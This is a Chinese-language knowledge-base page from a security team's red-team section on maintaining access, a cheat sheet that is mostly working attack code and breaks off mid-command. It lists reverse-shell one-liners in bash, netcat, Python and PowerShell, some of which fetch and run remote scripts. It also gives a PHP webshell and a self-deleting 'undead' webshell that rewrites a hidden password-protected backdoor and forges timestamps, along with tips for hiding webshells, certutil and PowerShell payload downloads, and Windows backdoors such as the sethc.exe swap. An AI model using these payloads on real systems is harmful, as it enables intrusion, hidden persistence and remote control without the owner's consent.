<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <title>权限维持 | 狼组安全团队公开知识库</title>
    <meta name="description" content="">
    <meta name="generator" content="VuePress 1.7.1">
    <link rel="icon" href="/assets/logo.svg">
    <script type="text/javascript" src="/assets/js/push.js"></script>
    <meta name="description" content="致力于打造信息安全乌托邦">
    <meta name="referrer" content="never">
    <meta name="keywords" content="知识库,公开知识库,狼组,狼组安全团队知识库,knowledge">
    <link rel="preload" href="/assets/css/0.styles.32ca519c.css" as="style"><link rel="preload" href="/assets/js/app.f7464420.js" as="script"><link rel="preload" href="/assets/js/2.26207483.js" as="script"><link rel="preload" href="/assets/js/54.d132c2f8.js" as="script"><link rel="prefetch" href="/assets/js/10.55514509.js"><link rel="prefetch" href="/assets/js/11.ec576042.js"><link rel="prefetch" href="/assets/js/12.a5584a2f.js"><link rel="prefetch" href="/assets/js/13.c9f84b2e.js"><link rel="prefetch" href="/assets/js/14.d2a5440c.js"><link rel="prefetch" href="/assets/js/15.2f271296.js"><link rel="prefetch" href="/assets/js/16.0895ce42.js"><link rel="prefetch" href="/assets/js/17.627e2976.js"><link rel="prefetch" href="/assets/js/18.73745a4c.js"><link rel="prefetch" href="/assets/js/19.19350186.js"><link rel="prefetch" href="/assets/js/20.e4eac589.js"><link rel="prefetch" href="/assets/js/21.fc0657ba.js"><link rel="prefetch" href="/assets/js/22.f4a1220f.js"><link rel="prefetch" href="/assets/js/23.c8cce92d.js"><link rel="prefetch" href="/assets/js/24.46225ec2.js"><link rel="prefetch" href="/assets/js/25.9b6d75e4.js"><link rel="prefetch" href="/assets/js/26.288f535e.js"><link rel="prefetch" href="/assets/js/27.865bdc75.js"><link rel="prefetch" href="/assets/js/28.f4224fef.js"><link rel="prefetch" href="/assets/js/29.6393a40b.js"><link rel="prefetch" href="/assets/js/3.a509f503.js"><link rel="prefetch" href="/assets/js/30.d5a49f97.js"><link rel="prefetch" href="/assets/js/31.eb3647df.js"><link rel="prefetch" href="/assets/js/32.7f48a571.js"><link rel="prefetch" href="/assets/js/33.1f374ffa.js"><link rel="prefetch" href="/assets/js/34.5a911179.js"><link rel="prefetch" href="/assets/js/35.d2bcc7ef.js"><link rel="prefetch" href="/assets/js/36.42e440bd.js"><link rel="prefetch" href="/assets/js/37.dedbbdea.js"><link rel="prefetch" href="/assets/js/38.d68d1f69.js"><link rel="prefetch" href="/assets/js/39.e278f860.js"><link rel="prefetch" href="/assets/js/4.35636da8.js"><link rel="prefetch" href="/assets/js/40.97f4e937.js"><link rel="prefetch" href="/assets/js/41.38630688.js"><link rel="prefetch" href="/assets/js/42.cae56aa5.js"><link rel="prefetch" href="/assets/js/43.61a04b16.js"><link rel="prefetch" href="/assets/js/44.5c6230f2.js"><link rel="prefetch" href="/assets/js/45.0f1355ae.js"><link rel="prefetch" href="/assets/js/46.c1906649.js"><link rel="prefetch" href="/assets/js/47.7ae220ce.js"><link rel="prefetch" href="/assets/js/48.59af224e.js"><link rel="prefetch" href="/assets/js/49.6a33a171.js"><link rel="prefetch" href="/assets/js/5.08ab40ee.js"><link rel="prefetch" href="/assets/js/50.f14601d2.js"><link rel="prefetch" href="/assets/js/51.f20841fd.js"><link rel="prefetch" href="/assets/js/52.fb0a5327.js"><link rel="prefetch" href="/assets/js/53.8013048c.js"><link rel="prefetch" href="/assets/js/55.87aa8b5d.js"><link rel="prefetch" href="/assets/js/56.161f38ad.js"><link rel="prefetch" href="/assets/js/57.bd6a2ef2.js"><link rel="prefetch" href="/assets/js/58.8a69f15a.js"><link rel="prefetch" href="/assets/js/59.93c0e2de.js"><link rel="prefetch" href="/assets/js/6.fda5ce3a.js"><link rel="prefetch" href="/assets/js/60.10091d44.js"><link rel="prefetch" href="/assets/js/61.cd1e3b10.js"><link rel="prefetch" href="/assets/js/62.9c0ad8c5.js"><link rel="prefetch" href="/assets/js/63.4a8dd9d2.js"><link rel="prefetch" href="/assets/js/64.6bf3fede.js"><link rel="prefetch" href="/assets/js/65.7a2ccc50.js"><link rel="prefetch" href="/assets/js/66.874d563b.js"><link rel="prefetch" href="/assets/js/67.bb86eab2.js"><link rel="prefetch" href="/assets/js/68.c1db2a2b.js"><link rel="prefetch" href="/assets/js/69.8141480b.js"><link rel="prefetch" href="/assets/js/7.d1fe6bef.js"><link rel="prefetch" href="/assets/js/70.9fb74c80.js"><link rel="prefetch" href="/assets/js/71.d1e4e9ab.js"><link rel="prefetch" href="/assets/js/72.e6bf83fb.js"><link rel="prefetch" href="/assets/js/73.6dd6c980.js"><link rel="prefetch" href="/assets/js/74.3612ba47.js"><link rel="prefetch" href="/assets/js/75.6e1a2434.js"><link rel="prefetch" href="/assets/js/76.5bfa4bcc.js"><link rel="prefetch" href="/assets/js/77.784df031.js"><link rel="prefetch" href="/assets/js/78.aa94a0a0.js"><link rel="prefetch" href="/assets/js/79.c4e9a4f2.js"><link rel="prefetch" href="/assets/js/8.63fd05d7.js"><link rel="prefetch" href="/assets/js/80.8d47d1f7.js"><link rel="prefetch" href="/assets/js/81.1160b022.js"><link rel="prefetch" href="/assets/js/82.7d17e5c8.js"><link rel="prefetch" href="/assets/js/83.a2ff144a.js"><link rel="prefetch" href="/assets/js/84.53d29383.js"><link rel="prefetch" href="/assets/js/9.b49161a4.js">
    <link rel="stylesheet" href="/assets/css/0.styles.32ca519c.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><header class="navbar"><div class="ant-row"><div class="nav-button"><i aria-label="icon: bars" class="anticon anticon-bars"><svg viewBox="0 0 1024 1024" focusable="false" data-icon="bars" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M912 192H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zM104 228a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0z"></path></svg></i> <span></span></div> <div class="ant-col ant-col-xs-24 ant-col-sm-24 ant-col-md-6 ant-col-lg-5 ant-col-xl-5 ant-col-xxl-4"><a href="/" class="router-link-active home-link"><img src="/assets/logo.svg" alt="狼组安全团队公开知识库" class="logo"> <span class="site-name">狼组安全团队公开知识库</span></a> <div class="search-box mobile-search"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div></div> <div class="ant-col ant-col-xs-0 ant-col-sm-0 ant-col-md-18 ant-col-lg-19 ant-col-xl-19 ant-col-xxl-20"><div class="search-box"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div> <nav class="nav-links can-hide"><ul role="menu" id="nav" class="ant-menu ant-menu-horizontal ant-menu-root ant-menu-light"><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/" class="router-link-active">
          首页
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/guide/">
          使用指南
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/knowledge/" class="router-link-active">
          知识库
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/opensource/">
          开源项目
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="visibility:hidden;position:absolute;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li></ul> <a href="https://github.com/wgpsec" target="_blank" rel="noopener noreferrer" class="repo-link"><i aria-label="icon: github" class="anticon anticon-github"><svg viewBox="64 64 896 896" focusable="false" data-icon="github" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M511.6 76.3C264.3 76.2 64 276.4 64 523.5 64 718.9 189.3 885 363.8 946c23.5 5.9 19.9-10.8 19.9-22.2v-77.5c-135.7 15.9-141.2-73.9-150.3-88.9C215 726 171.5 718 184.5 703c30.9-15.9 62.4 4 98.9 57.9 26.4 39.1 77.9 32.5 104 26 5.7-23.5 17.9-44.5 34.7-60.8-140.6-25.2-199.2-111-199.2-213 0-49.5 16.3-95 48.3-131.7-20.4-60.5 1.9-112.3 4.9-120 58.1-5.2 118.5 41.6 123.2 45.3 33-8.9 70.7-13.6 112.9-13.6 42.4 0 80.2 4.9 113.5 13.9 11.3-8.6 67.3-48.8 121.3-43.9 2.9 7.7 24.7 58.3 5.5 118 32.4 36.8 48.9 82.7 48.9 132.3 0 102.2-59 188.1-200 212.9a127.5 127.5 0 0 1 38.1 91v112.5c.8 9 0 17.9 15 17.9 177.1-59.7 304.6-227 304.6-424.1 0-247.2-200.4-447.3-447.5-447.3z"></path></svg></i></a></nav></div></div> <!----></header> <aside class="sidebar"><div><div class="promo"><div id="promo_3"><div class="promo_title">赞助商</div> <button type="button" class="ant-btn ant-btn-primary ant-btn-background-ghost"><span>成为赞助商</span></button></div></div> <div role="separator" id="reset-margin" class="ant-divider ant-divider-horizontal ant-divider-dashed"></div></div> <ul class="sidebar-links"><li><a href="/knowledge/" aria-current="page" title="知识库广告位招租" class="sidebar-link">知识库广告位招租</a></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>CTF</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>基础知识</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>工具手册</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>Web安全</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading open"><span>攻防对抗</span> <span class="arrow down"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/knowledge/hw/" aria-current="page" title="分类简介" class="sidebar-link">分类简介</a></li><li><a href="/knowledge/hw/border-info.html" title="互联网边界打点" class="sidebar-link">互联网边界打点</a></li><li><a href="/knowledge/hw/agent.html" title="构建通道漫游内网" class="sidebar-link">构建通道漫游内网</a></li><li><a href="/knowledge/hw/host-survival-domain.html" title="域内主机存活探测" class="sidebar-link">域内主机存活探测</a></li><li><a href="/knowledge/hw/intradomain-port.html" title="域内主机端口探测方法" class="sidebar-link">域内主机端口探测方法</a></li><li><a href="/knowledge/hw/to-root.html" title="权限提升" class="sidebar-link">权限提升</a></li><li><a href="/knowledge/hw/hold-root.html" aria-current="page" title="权限维持" class="active sidebar-link">权限维持</a></li><li><a href="/knowledge/hw/transverse.html" title="内网横向移动技巧" class="sidebar-link">内网横向移动技巧</a></li><li><a href="/knowledge/hw/log-action.html" title="日志处理" class="sidebar-link">日志处理</a></li><li><a href="/knowledge/hw/2020-defend-tips.html" title="【防守方】2020攻防演练防守心得" class="sidebar-link">【防守方】2020攻防演练防守心得</a></li><li><a href="/knowledge/hw/windows-emergency-response.html" title="【防守方】Windows应急响应" class="sidebar-link">【防守方】Windows应急响应</a></li><li><a href="/knowledge/hw/linux-emergency-response.html" title="【防守方】Linux应急响应" class="sidebar-link">【防守方】Linux应急响应</a></li><li><a href="/knowledge/hw/kill-webshell.html" title="【防守方】Webshell排查" class="sidebar-link">【防守方】Webshell排查</a></li><li><a href="/knowledge/hw/purple-team.html" title="【裁判方】紫队视角看2020年络网络攻防实战演习" class="sidebar-link">【裁判方】紫队视角看2020年络网络攻防实战演习</a></li></ul></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>代码审计</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li></ul></aside> <main class="page"> <div class="theme-antdocs-content content__default"><h2 id="反弹shell">反弹Shell <a href="#反弹shell" class="header-anchor">#</a></h2> <p><strong>攻击者VPS监听</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">nc</span> -lvp <span class="token number">9999</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>BASH</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>/bin/bash -i <span class="token operator">&amp;&gt;</span> /dev/tcp/192.168.0.198/9999 <span class="token operator">&lt;</span><span class="token file-descriptor important">&amp;1</span>

/bin/sh -i <span class="token operator">&amp;&gt;</span> /dev/tcp/192.168.0.198/9999 <span class="token operator">&lt;</span><span class="token file-descriptor important">&amp;1</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p><strong>Netcat</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">nc</span> -e /bin/bash <span class="token number">192.168</span>.0.198 <span class="token number">9999</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>PowerShell</strong></p> <p>将ps1脚本先放到VPS上</p> <div class="language-powershell line-numbers-mode"><pre class="language-powershell"><code><span class="token comment">##TCP</span>
powershell <span class="token function">IEX</span> <span class="token punctuation">(</span><span class="token function">New-Object</span> Net<span class="token punctuation">.</span>WebClient<span class="token punctuation">)</span><span class="token punctuation">.</span>DownloadString<span class="token punctuation">(</span><span class="token string">'https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1'</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token function">Invoke-PowerShellTcp</span> <span class="token operator">-</span>Reverse <span class="token operator">-</span>IPAddress 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>0<span class="token punctuation">.</span>198 <span class="token operator">-</span>port 9999

<span class="token comment">##UDP</span>
powershell <span class="token function">IEX</span> <span class="token punctuation">(</span><span class="token function">New-Object</span> Net<span class="token punctuation">.</span>WebClient<span class="token punctuation">)</span><span class="token punctuation">.</span>DownloadString<span class="token punctuation">(</span><span class="token string">'http://192.168.159.134/nishang/Shells/Invoke-PowerShellUdp.ps1'</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token function">Invoke-PowerShellUdp</span> <span class="token operator">-</span>Reverse <span class="token operator">-</span>IPAddress 10<span class="token punctuation">.</span>1<span class="token punctuation">.</span>1<span class="token punctuation">.</span>1 <span class="token operator">-</span>port 53

<span class="token comment">##ICMP</span>
powershell <span class="token function">IEX</span> <span class="token punctuation">(</span><span class="token function">New-Object</span> Net<span class="token punctuation">.</span>WebClient<span class="token punctuation">)</span><span class="token punctuation">.</span>DownloadString<span class="token punctuation">(</span><span class="token string">'http://192.168.159.134/nishang/Shells/Invoke-PowerShellIcmp.ps1'</span><span class="token punctuation">)</span><span class="token punctuation">;</span><span class="token function">Invoke-PowerShellIcmp</span> <span class="token operator">-</span>IPAddress 192<span class="token punctuation">.</span>168<span class="token punctuation">.</span>159<span class="token punctuation">.</span>134
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br></div></div><p><strong>Python</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>python -c <span class="token string">'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect<span class="token variable"><span class="token punctuation">((</span>&quot;<span class="token number">10.1</span><span class="token number">.1</span><span class="token number">.1</span>&quot;<span class="token punctuation">,</span><span class="token number">9999</span><span class="token punctuation">))</span></span>;os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);'</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>PHP</strong></p> <p>https://github.com/pentestmonkey/php-reverse-shell</p> <p>PHP 交互式反弹Shell，修改反弹IP后上传到目标访问一下即可。</p> <h2 id="获取webshell">获取Webshell <a href="#获取webshell" class="header-anchor">#</a></h2> <p><strong>隐藏WebShell</strong></p> <blockquote><p>1、仿照已存在的文件起名字，隐藏在深层目录， 创建…目录隐藏shell
2、利用静态文件，比如图片马然后利用 .htaccess 进行解析
3、修改WebShell时间戳为同目录下其它文件相同的时间</p></blockquote> <p><strong>快速应用</strong></p> <p>直接上冰蝎加密shell，或哥斯拉内存马（基于tomcat）
冰蝎：https://github.com/rebeyond/Behinder
哥斯拉：https://github.com/BeichenDream/Godzilla</p> <p><strong>PHP-Webshell</strong></p> <p>文件免杀（Apache、Nginx特性）cmd</p> <div class="language-php line-numbers-mode"><pre class="language-php"><code><span class="token php language-php"><span class="token delimiter important">&lt;?</span> <span class="token function">assert</span><span class="token punctuation">(</span><span class="token function">implode</span><span class="token punctuation">(</span><span class="token function">reset</span><span class="token punctuation">(</span><span class="token function">get_defined_vars</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token punctuation">;</span>	<span class="token comment">//返回由所有已定义变量所组成的数组 </span>

<span class="token keyword">Use</span> age：cmd<span class="token punctuation">.</span>php<span class="token operator">?</span>a<span class="token operator">=</span><span class="token function">system</span><span class="token punctuation">(</span>whoami<span class="token punctuation">)</span><span class="token punctuation">;</span>

适用于<span class="token constant">PHP</span> <span class="token operator">&lt;</span> <span class="token number">7.1</span> ，因为在<span class="token constant">PHP7</span><span class="token punctuation">.</span><span class="token number">1</span>之后assert被弃用了、<span class="token number">7.2</span> create_function被弃用了
</span></code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><strong>内存马</strong></p> <div class="language-php line-numbers-mode"><pre class="language-php"><code>//nodie_shell.php
<span class="token php language-php"><span class="token delimiter important">&lt;?php</span>
	<span class="token function">set_time_limit</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span><span class="token punctuation">;</span>			<span class="token comment">//设置脚本最大执行时间,0 即为无时间限制</span>
	<span class="token function">ignore_user_abort</span><span class="token punctuation">(</span><span class="token boolean constant">true</span><span class="token punctuation">)</span><span class="token punctuation">;</span>	<span class="token comment">//设置与客户机断开不终止脚本的执行</span>
	<span class="token function">unlink</span><span class="token punctuation">(</span><span class="token constant">__FILE__</span><span class="token punctuation">)</span><span class="token punctuation">;</span>			<span class="token comment">//删除文件自身</span>
	<span class="token variable">$file</span> <span class="token operator">=</span> <span class="token single-quoted-string string">'/var/www/html/.shell.php'</span><span class="token punctuation">;</span>	
	<span class="token variable">$code</span> <span class="token operator">=</span> <span class="token single-quoted-string string">'&lt;?php if(md5($_POST[&quot;pass&quot;])==&quot;cdd7b7420654eb16c1e1b748d5b7c5b8&quot;){@system($_POST[a]);}?&gt;'</span><span class="token punctuation">;</span>
	<span class="token keyword">while</span> <span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span> <span class="token punctuation">{</span>
		<span class="token function">file_put_contents</span><span class="token punctuation">(</span><span class="token variable">$file</span><span class="token punctuation">,</span> <span class="token variable">$code</span><span class="token punctuation">)</span><span class="token punctuation">;</span>	<span class="token comment">//写shell文件</span>
		<span class="token function">system</span><span class="token punctuation">(</span><span class="token single-quoted-string string">'touch -m -d &quot;2014-10-31 13:50:11&quot; .shell.php'</span><span class="token punctuation">)</span><span class="token punctuation">;</span>		<span class="token comment">//修改时间戳</span>
		<span class="token function">usleep</span><span class="token punctuation">(</span><span class="token number">1000</span><span class="token punctuation">)</span><span class="token punctuation">;</span>			<span class="token comment">//以指定的微秒数延缓程序的执行</span>
	<span class="token punctuation">}</span>
<span class="token delimiter important">?&gt;</span></span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br><span class="line-number">8</span><br><span class="line-number">9</span><br><span class="line-number">10</span><br><span class="line-number">11</span><br><span class="line-number">12</span><br><span class="line-number">13</span><br></div></div><p><strong>杀死PHP不死马</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token number">1</span>、高权限，重启服务
<span class="token function">service</span> apache2 restart
<span class="token function">service</span> php restart

<span class="token number">2</span>、低权限，杀掉所有进程
<span class="token function">kill</span> -9 -1
<span class="token function">killall</span> apache2
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><hr> <h2 id="文件传输">文件传输 <a href="#文件传输" class="header-anchor">#</a></h2> <p><strong>Python搭建简单的HTTP服务</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>python -m http.server <span class="token number">80</span>

python2 -m SimpleHTTPServer <span class="token number">80</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br></div></div><p><strong>SCP</strong></p> <p>上传</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">scp</span> <span class="token number">123</span>.txt root@10.10.10.10:~/123.txt
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>下载</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">scp</span> root@210.210.210.10:/home/root/1.txt ./1.txt
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>Bash Download</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#服务器监听</span>
<span class="token function">nc</span> -lp <span class="token number">1337</span> <span class="token operator">&lt;</span> <span class="token number">666</span>.txt

<span class="token comment">#客户端下载</span>
<span class="token function">bash</span> -c <span class="token string">'cat &lt; /dev/tcp/10.10.10.10/1337 &gt; 666.txt'</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><strong>certutil 下载</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>certutil -urlcache -split -f http://10.10.10.10:80/npc.exe
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>PowerShell 下载</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>powershell <span class="token punctuation">(</span>new-object System.Net.WebClient<span class="token punctuation">)</span>.DownloadFile<span class="token punctuation">(</span><span class="token string">'http://192.168.174.1:1234/evil.txt'</span>,<span class="token string">'evil.exe'</span><span class="token punctuation">)</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>Windows查找文件</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">dir</span> /s *.jsp
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token keyword">for</span> /r D:<span class="token punctuation">\</span>developer %i <span class="token keyword">in</span> <span class="token punctuation">(</span>*.jspx<span class="token punctuation">)</span> <span class="token keyword">do</span> @echo %i
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><hr> <h2 id="系统后门">系统后门 <a href="#系统后门" class="header-anchor">#</a></h2> <h3 id="windows">Windows <a href="#windows" class="header-anchor">#</a></h3> <p><strong>Schtasks后门</strong></p> <p>Schtasks.exe能够在本地或远程计算机上创建，删除，查询，更改，运行和结束计划任务</p> <p>不带参数运行Schtasks.exe会显示每个已注册任务的状态和下一次运行时间。</p> <p><strong>wmi后门</strong></p> <p>WMI后门使用了WMI的两个特征：<strong>无文件</strong>和<strong>无进程</strong>（需要管理员权限运行）。</p> <p><strong>原理是</strong>：将代码加密存储与WMI中，即无文件；调用PowerShell执行后门程序，执行后进程消失，即无进程。</p> <p><strong>在Empire中使用Invoke-WMI模块</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>usemodule powershell/persistence/elevated/wmi	<span class="token comment">#设置参数run</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><blockquote><p><strong>检查后门</strong>：使用微软提供的工具<code>Autoruns</code>：</p> <p>https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns</p></blockquote> <p><strong>DLL劫持后门</strong></p> <p>DLL劫持原理就是使用 <code>loadlibrary</code> 动态加载DLL</p> <p>DLL劫持工具：<a href="https://github.com/anhkgg/SuperDllHijack" target="_blank" rel="noopener noreferrer">SuperDllHijack<span><svg xmlns="http://www.w3.org/2000/svg" aria-hidden="true" focusable="false" x="0px" y="0px" viewBox="0 0 100 100" width="15" height="15" class="icon outbound"><path fill="currentColor" d="M18.8,85.1h56l0,0c2.2,0,4-1.8,4-4v-32h-8v28h-48v-48h28v-8h-32l0,0c-2.2,0-4,1.8-4,4v56C14.8,83.3,16.6,85.1,18.8,85.1z"></path> <polygon fill="currentColor" points="45.7,48.7 51.3,54.3 77.2,28.5 77.2,37.2 85.2,37.2 85.2,14.9 62.8,14.9 62.8,22.9 71.5,22.9"></polygon></svg> <span class="sr-only">(opens new window)</span></span></a></p> <p><strong>映像劫持shift后门</strong></p> <p><strong>替换sethc.exe为cmd.exe</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>CD C:<span class="token punctuation">\</span>windows<span class="token punctuation">\</span>system32
cacls sethc.exe /t /e /G Administrators:f
cacls cmd.exe /t /e /G Administrators:f
ren sethc.exe aaa.exeren cmd.exe sethc.exe

<span class="token comment">#恢复</span>
